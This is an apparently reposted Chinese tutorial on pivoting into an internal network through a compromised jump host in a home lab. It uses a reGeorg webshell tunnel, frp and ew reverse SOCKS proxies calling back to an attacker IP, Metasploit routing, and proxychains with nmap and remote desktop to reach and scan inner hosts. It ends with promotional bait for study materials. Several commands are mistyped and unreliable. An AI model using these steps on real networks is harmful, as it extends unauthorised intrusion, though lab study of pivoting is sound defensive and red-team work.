一文让你熟练运用内网穿透（超详细），网络安全零基础入门到实战，看这一篇就够了！

前言

内网穿透一直是后渗透的重点，网上这方面的文章很多，吸收总结，花了2天时间整理一份内网穿透的工具应用，力争用最简洁的步骤手把手熟练运用内网穿透。

这里选用常用的4种方式：reGeorge、frp、ew、msf＋proxychains（对于不同的内网环境足够用了），其中frp和ew分别再Linux和Win两种环境做了实验

• 实验环境

• 两层网络环境可以自己搭建，

攻击机2台(kali 和 win10)：
192.168.211.164（VMnet8 NAT模式）,
192.168.211.193（VMnet8 NAT模式）

跳板机1台（win7）：
外网 192.168.211.224 （VMnet8 NAT模式） ,
内网 192.168.52.143(VMnet1仅主机模式)

内网机2台：``192.168.52.138(VMnet1仅主机模式) ，
192.168.52.141(VMnet1仅主机模式)

简单的网络拓扑图如下：

reGeorge

1.1 环境

攻击机kali

reGeorge软件，下载：https://github.com/sensepost/reGeorg

运行序偶需要的环境：

Python、pip、urllib3；

pip安装：

wget https://bootstrap.pypa.io/get-pip.pypython get-pip.py

依赖urllib3安装：

pip install urllib3

1.2 部署配置

上传tunnel.nosocket.php

前提条件，已获得跳板机的权限（都打到内网了，跳板机的权限肯定获得了），Windows7系统的跳板机是php环境，将reGeorge中的tunnel.nosocket.php上传至网站，并访问http://192.168.211.224/tunnel.nosocket.php访问成功

启动reGeorg

python reGeorgSocksProxy.py -p 1080 -uhttp://192.168.211.224/tunnel.nosocket.php #表示本地1080端口的流量都转发给指定的那个url，1080是指定的监听端口；

配置代理

然后配置proxychains代理链的配置文件/etc/proxychains.conf，将代理设置成本机的1080端口：socks5 127.0.0.1 1080

1.3 测试

命令前面加上proxychains 运行命令，（跳板机php环境已启动，存在主页index.php）

proxychainscurl http://192.168.52.143

reGeorg控制端

证明反向代理连接成功

frp

软件：frp_0.33.0_windows_amd64 ，frp_0.34.1_linux_amd64

代理工具Proxifier（windows下通常用可视化的proxifier、SocksCap64，Linux在proxychains设置）

---

2.1攻击机为windows环境

frp反向代理：

攻击机-服务端：

设置frps.ini

[common] bind_port = 7000

然后运行

frps.exe -c frps.ini

跳板机-客户端：

设置frpc.ini

[common]
server_addr = 192.168.211.193
server_port = 7000

[http_proxy]
type = tcp
remote_port = 8010
plugin=socks5

然后运行

frpc.exe -c frpc.ini

服务器端运行proxifier监听8010端口：

点击检查

proxifier里测试成功。

浏览器访问192.168.52.143 访问成功

测试远程，远程连接192.168.52.143、141（此两台机器远程连接均已开）

frp正向代理：

攻击机为客户端 frpc.ini

[common]
server_addr = 192.168.211.224
server_port = 7000

[http_proxy]
type = tcp
remote_port = 8010 plugin=socks5

执行

frpc.e -c frpc.ini

跳板机为服务器端

[common] bind_port = 7000

执行

frps.exe -c frps.ini

在攻击机-客户端上运行proxifier，添加服务器的地址192.168.211.214，端口8010，进行连接

不知道啥原因，连接跳板机内网192.168.52.143未成功，连接跳板外网卡192.168.211.214成功，

网上也搜索了大量frp 正向代理，貌似用frp做正向代理的不多，推出以后frp还是坚持用反向代理吧。

---

2.2 攻击机为 kali环境

frp反向代理

服务器端-攻击机：

frps.ini 配置内容

[common] bind_port = 7000

执行命令

./frps -c frps.ini

客户端-跳板机：

frpc.ini配置内容

[common]
server_addr = 192.168.211.193
server_port = 7000

[http_proxy] 
type = tcp    
#remote_port = 8010    
remote_port =1080   
plugin=socks5

执行命令

frpc.exe -c frpc.ini

配置proxychains代理链

配置文件/etc/proxychains.conf，

将代理设置成本机的1080端口(root用户修改)：

socks4 127.0.0.1 1080

然后命令前面加上proxychains即可。

测试：

proxychains curl http://192.168.52.143

proxychains rdesktop 192.168.52.141 （远程连接内网电脑桌面）

证明代理成功。

执行nmap

proxychains nsap -p 1-1000 -Pn -sT192.168.52.141

扫描C端存活机器和端口

roxychains nmap -p 1-65525 -Pn -sT192.168.52.0/24

总结frp优缺点

优点：使用反向代理，只需要把需要访问的内网主机和端口转发出来即可，速度较快

缺点：访问https网站时配置相对复杂

---

3.1 攻击机为windos10环境

ew正向代理

1.正向连接跳板机在win7机器上执行(ew_for_windows上传到跳板机)

ew_for_Win.exe -s ssocksd -l 888

攻击机-监听本机888端口。然后在win10机器上proxifier进行连接

测试http: 访问 http://192.168.52.143/成功

测试远程桌面：192.168.52.141 成功

ew反向代理

攻击机器上执行

ew_for_Win.exe -s rcsocks -l 1080 -e 1234

对外1234端口转发到1080端口，

-l 本地监听端口，待会连接这个端口作为 socks5 端口

-e 反弹中转端口

然后边缘机器连接

ew_for_Win.exe -s rssocks -d192.168.211.164 -e 1234

-d 指定反弹的主机，这里为公网 vps 的 ip

-e 指定反弹中转端口，和vps中的设置的一样

测试http: 访问 http://192.168.52.143/成功

测试远程桌面：192.168.52.141 成功

---

3.2 攻击机环境为kali

ew反向代理

服务端-攻击机kali

执行：

./ew_for_linux64 -s rcsocks -l 1080 -e 1024

客户端-跳板机

执行

ew_for_Win.exe -s rssocks -d192.168.211.193 -e 1024

配置proxychains代理链

在配置文件/etc/proxychains.conf，

将代理设置成本机的1080端口(root用户修改)：

测试执行：

执行curlhttp://192.168.211.219/index.php 证明网络是通

执行

proxychainscurl http://192.168.52.143/index.php

证明代理成功

连接成功。

执行namp

proxychains nmap -p 1-1000 -Pn -sT192.168.52.141

ew正向代理

服务器端-跳板机

执行命令：

ew_for_Win.exe -s ssocksd -l 1080

客户端-攻击机kali

配置proxychains代理链

在配置文件/etc/proxychains.conf，

将代理设置成服务器的IP和1080端口(root用户修改)：

测试执行：

执行

proxychains curl http://192.168.211.219/index.php

证明代理成功

下面几步均是测试代理条件下 nmap的运用

执行nmap扫描内网存活主机

proxychains map -PS 192.168.211.1/24

注意：在常规无代理的情况下扫描会很快

加入代理后扫描的较慢

无ping 扫描

proxychains nmap -p0 192.168.52.1/24

扫描存活主机开放端口

proxychains nmap -p 1-1000 -Pn -sT192.168.52.141

总结优缺点

优点：配置简单，相当于直接处于目标内网

缺点：速度较慢，不稳定

msf+proxychains

msf获得跳板机的权限（如何获得这里就不多叙述了，使用msf自带模块攻击），

（1）添加内网路由

添加路由的目的是为了让MSF其他模块能访问内网的其他主机，即52网段的攻击流量都通过已渗透的这台目标主机的meterpreter会话来传递；

（注：添加路由一定要在挂代理之前，因为代理需要用到路由功能）

使用arp -a 查看一下所有接口的当前ARP缓存

（2）添加socks代理，

添加socks4a代理的目的是为了让其他软件更方便的访问到内网的其他主机的服务；设置成功后打开其他程序时都要在前面加上proxychains。

通过reGeorge+socks4的方式（步骤详见本文00x1）添加代理

证明代理成功

题外话

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

网络安全学习路线&学习资源

下面给大家分享一份2025最新版的网络安全学习路线资料，帮助新人小白更系统、更快速的学习黑客技术！
对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

​

需要高清完整学习路线图，和全套网络安全技术教程的小伙伴！
↓↓↓ 扫描下方图片即可前往获取↓↓↓

学习资料电子文档

压箱底的好资料，全面地介绍网络安全的基础理论，包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等，将基础理论和主流工具的应用实践紧密结合，有利于读者理解各种主流工具背后的实现机制。

​

网络安全源码合集+工具包

​​​​​​

视频教程
很多朋友都不喜欢晦涩的文字，我也为大家准备了视频教程，，每个章节都是当前板块的精华浓缩。（全套教程点击领取哈）

​ 优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享

​​ 因篇幅有限，仅展示部分资料，需要扫描下方图片即可前往获取

好了就写到这了,大家有任何问题也可以随时私信问我!希望大家不要忘记点赞收藏哦!

特别声明：

此教程为纯技术分享！本文的目的决不是为那些怀有不良动机的人提供及技术支持！也不承担因为技术被滥用所产生的连带责任！本书的目的在于最大限度地唤醒大家对网络安全的重视，并采取相应的安全措施，从而减少由网络安全而带来的经济损失。！！！

本文转自网络，如有侵权请联系删除。